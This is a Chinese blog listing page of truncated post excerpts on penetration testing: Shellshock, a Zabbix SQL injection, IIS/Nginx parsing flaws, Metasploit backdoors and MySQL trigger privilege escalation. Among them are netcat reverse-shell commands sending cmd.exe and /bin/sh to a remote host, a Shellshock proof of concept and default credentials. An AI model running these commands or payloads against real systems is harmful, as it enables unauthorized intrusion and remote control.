- 博客(22)
- 收藏
- 关注
转载 宽字符sql注入
以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要注意:通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节。在php中,我们可以通过输出echo strlen("和");来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。除了gbk以外,所有ANSI编码都是2个字节。ansi只是一个标准,在不用的
2015-10-09 15:57:08
2609
转载 Bash 3.0-4.3命令执行漏洞分析
POC在Bash Shell下执行以下代码:env x='() { :;}; echo vulnerable' bash -c "echo this is a test"如果输出:vulnerablethis is a test原理分析:Shell里可以定义变量,POC中定义了一个命名为x的变量,内容是一个字符串:() { :;}; echo vulne
2015-09-07 15:34:21
783
转载 python编码问题
为什么Python使用过程中会出现各式各样的乱码问题,明明是中文字符却显示成“\xe4\xb8\xad\xe6\x96\x87”的形式?为什么会报错“UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)”?本文就来研究一下这个问题。
2015-09-01 11:05:15
565
原创 Burpsuite截获https数据包
1.首先打开一个https网站,选择右侧 选项-->高级-->证书2.找到百度的证书------并导出在火狐浏览器中,使用Burp suite代理随意打开一个https链接,获取相关证书,并导出:直接导出证书:3.然后导入证书,并确定之后就可以截获到https的请求了
2015-08-10 17:16:50
5758
转载 Burp修改response欺骗
我来分享一个小技巧,Burp修改response欺骗小胖子 (VIP你快回来,园长欺负我!) | 2014-05-29 11:38上次看到某同学在问,很多人都说用fiddler。在drops里面的burp教程也是一笔带过,没有很好的实例。这里就说一下,很多网站,在做验证的时候,是基于js的验证,判断浏览器返回的json也好,布尔值也好,来判断是否跳转,判断是否合法等,我们先不讨论这
2015-07-23 15:51:36
12707
1
转载 jboss安全问题
0x01 invoker/JMXInvokerServlet直接访问http://$hostname/invoker/JMXInvokerServlet时提示下载即存在配置问题利用方法 http://www.219.me/posts/26470x02 JMX控制台允许通过web浏览器与JBoss应用服务器直接互动的组件http://$hostname/jm
2015-05-27 21:58:39
656
原创 zabbix漏洞总结
0x01 zabbix的默认账户与密码默认口令 admin/zabbix或者是guest/空 ,(系统内置账户)可以多试试0x02 zabbix注入 CVE-2013-5743(影响版本 1.8.5-1.8.9)前提guest账户可以登录exp利用:http://zabbix.server/zabbix/httpmon.php?applications=2 and (se
2015-05-23 22:15:18
3923
原创 一些安全问题
0x01 mongodb未授权访问扫描服务器是否开启了端口27017,使用客户端直接连接客户端下载 http://www.mongovue.com/downloads/ 0x02 mongdb的REST接口,提供一个web界面访问,默认运行在28017端口上,扫描28017,可以直接通过浏览器访问http://host:28017 这个借口的开启需要修改配置
2015-05-21 22:03:01
608
原创 svn配置错误,利用方法
有的站点使用.svn来做生产环境版本控制,但是.svn目录没有做访问权限限制,可以通过.svn/entries来遍历文件和目录列表。如果*.php.svn-base不被当.php来执行,那么恭喜你,svn中的.php程序源码随你下了,分析源码可能能帮助你发现更多漏洞。 如果.php.svn-base被当成php文件来执行了,可能看到php错误信息(看到真实路径)或内容为空白,那么,同样恭喜你,这个
2015-05-21 12:07:41
644
转载 PL/SQL Developer安装配置实践
基本环境:服务器端:oracle11.2g X64客户端:Windows 8.1 X641 下载安装oracle的精简客户端从oracle官网下载最新版intantclient,目前最新版是12.1。因为oracle的客户端是向下兼容的,所以12.1版本的客户端可以连接所有12.1以下版本的服务器端,当然包括11.2。既然使用PL/SQL Developer,就不需要再
2014-11-29 19:51:46
389
转载 Apache安全配置
0x00 测试环境centos6.5+apache2.2.15+php5.3.30x01 php的运行模式介绍php的运行模式分四种:1. CGI通用网关接口 2. fast-cgi常驻型的CGI 3. cli命令行运行 4. web模块模式 一般情况下,apache使用web模块模式运行php0x02 Apache运行原理介绍Apache是基于模块
2014-11-29 19:08:21
361
转载 Mysql Trigger (可以用作提权)
0x00 什么是触发器触发器(trigger)是数据库提供给程序员和数据分析员来保证数据完整性的一种方法,它是与表事件相关的特殊的储存过程,它的执行不是由程序调用,也不是手工启动,而是由事件来触发,当对一个表进行操作(insert,delete,update)时就会激活它执行。触发器经常用于加强数据的完整性约束和业务规则等。0x01 问题描述a)通过Mysql触发器提权仅仅能获
2014-11-29 19:02:54
870
转载 IIS 6.0/7.0/7.5、Nginx、Apache 等服务器解析漏洞总结
[+]IIS 6.0目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)IIS6.0 都会把此类后缀文件成功解析为 asp 文件。(站长评论:IIS6.0解析漏洞的
2014-11-29 18:57:28
629
转载 metasploit渗透测试笔记(内网渗透篇)
0x01 reverse the shellFile通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。reverse_tcp/http/https => exe => victim => shellreverse_tcpwindows:msfpayload windows/me
2014-11-29 18:52:45
867
转载 .net中的数据连接信息的位置
0x01 寻找方式先说一般的数据库连接信息。第一种一般在web.config,如某套OA就是将连接字符串存放在该文件内,如下图:第二种有的ASP.NET程序功能较多,会自定义其它config文件,所以可能会存在多个config,而数据库连接信息就存放在其它config文件中,比如逐浪CMS(你们懂的)就有多个config文件,如下图:但数据库相关连接信息存放在C
2014-11-29 18:49:48
1036
转载 mysql在渗透中的技巧总结
mysql在渗透中的技巧总结...目录:0×00 mysql一般注入(select)0×01 mysql一般注入(insert、update)0×02 mysql报错注入0×03 mysql一般盲注0×04 mysql时间盲注0×05 mysql其他注入技巧0×06 mysql数据库版本特性0×07 声明正文:0×
2014-10-08 20:19:15
756
转载 域渗透相关知识
有人说域是一种组织结构,是个安全边界。域也有另为一个名字,“活动目录”。不管域是什么,它总有一些特点,有了它,对管理一个机构的组织单元,人员,特别是计算机就方便了许多,特别是计算机,因为域就是建立在计算机上的。加入域里的计算机,共享文件,共享上网就会很方便。域里有个比较重要的角色,域控制器(DC)。它有至高无上的权限,它可以在域里对其他计算机(DA)胡作非为。域控制器里还有域内所有用户的帐号密
2014-10-08 19:54:41
897
转载 php文件锁:共享锁和排他锁的理解
文件锁有两种:共享锁和排他锁,也就是读锁(LOCK_SH)和写锁(LOCK_EX) 文件的锁一般这么使用: $fp = fopen("filename", "a"); flock($fp, LOCK_SH) or die("lock error") $str = fread($fp, 1024); flock($fp, LOCK_UN);
2014-08-17 17:09:49
2927
转载 反弹shell
本地Windows监听nc -vv -l -p 1234 远程Windows转发nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234 远程Linux转发./netcat 8.8.8.8 1234 -e /bin/shReverseS
2014-07-15 22:27:51
610
转载 vc真彩工具条的实现
例子程序最终效果图: 一直在寻找制作一个 24bit 及以上真彩工具条的简单有效方法,在各种VC站点都找到了很多有关这方面的文章和介绍,但是都存在一个不足的地方,介绍的不够详细,对初学者来说有点难度。最近终于有所发现,因此在这里将自己在制作真彩工具条方面的小经验介绍给大家,以期抛砖引玉。在这里将介绍两个重点的内容,一个是制作真彩工具条的图形工具 Visual toolbar,另
2014-07-15 14:30:55
578
转载 用 VC++建立 Windows 服务程序
本文主要介绍了 OpenSCManager、CreateService、OpenService、ControlService、DeleteService、 RegisterServiceCtrlHandler、SetServiceStatus、StartServiceCtrlDispatcher等操作服务程序的主要几个API的用法,具体的函数参数大家可以查阅MSDN。为什么要使用服务应该程
2014-07-15 14:29:30
471
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人